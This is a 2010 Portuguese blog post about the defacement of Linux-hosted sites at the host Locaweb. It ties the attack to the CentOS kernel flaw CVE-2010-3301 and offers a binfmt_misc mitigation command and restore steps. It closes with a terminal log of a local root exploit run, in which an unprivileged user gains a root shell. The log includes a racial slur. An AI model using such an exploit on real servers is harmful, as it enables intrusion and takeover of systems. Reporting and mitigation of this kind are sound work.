Monday, September 20, 2010

Sites hospedados na Locaweb sofrem deface por hacker turco

O serviço de hospedagem brasileiro Locaweb sofreu um ataque de um cracker turco em 17/09, que tirou diversos sites do ar. Ainda não se sabe a quantidade exata de páginas que sofreram o ataque. Segundo informações de um dos clientes da Locaweb, os sites que estavam em servidores Linux foram afetados, mas os que tinham seus arquivos em máquinas com Windows não tiveram problemas.


Até o site da ICCyber sofreu com a ação.




Ele encontrou uma falha nos servidores da empresa que permitia que arquivos fossem inseridos numa pasta sem permissão para escrita. Assim, vários sites tiveram suas páginas iniciais substituídas pelas criadas pelo hacker.

A solução para reverter o deface é simples: basta logar no FTP do servidor, deletar os arquivos index.htm, index.html, index.php e default.php e fazer upload novamente da versão anterior que, espera-se, foi salva localmente e não na web.
Esta vulneravilidade ficou conhecida como IA32 System Call Entry Point Vulnerability do CentOS.

Se você tem um servidor com centOS x86_64 rodando, pode executar um path de correção, facilmente:

echo ':32bits:M:0:\x7fELF\x01::/bin/echo:' > /proc/sys/fs/binfmt_misc/register

Dados da Falha:

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-3301
https://access.redhat.com/kb/docs/DOC-40265
Bug 634449 - (CVE-2010-3301) CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability
Exploit:
Exemplo de uso do exploit:
2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:08:30 EDT 2010 x86_64 x86_64 x86_64
GNU/Linux
[hacky@ks310439 ~]$ id
uid=518(hacky) gid=518(hacky) groups=518(hacky)
[hacky@ks310439 ~]$ ./a.out
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.3.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=518(hacky) groups=518(hacky)

No comments:

Post a Comment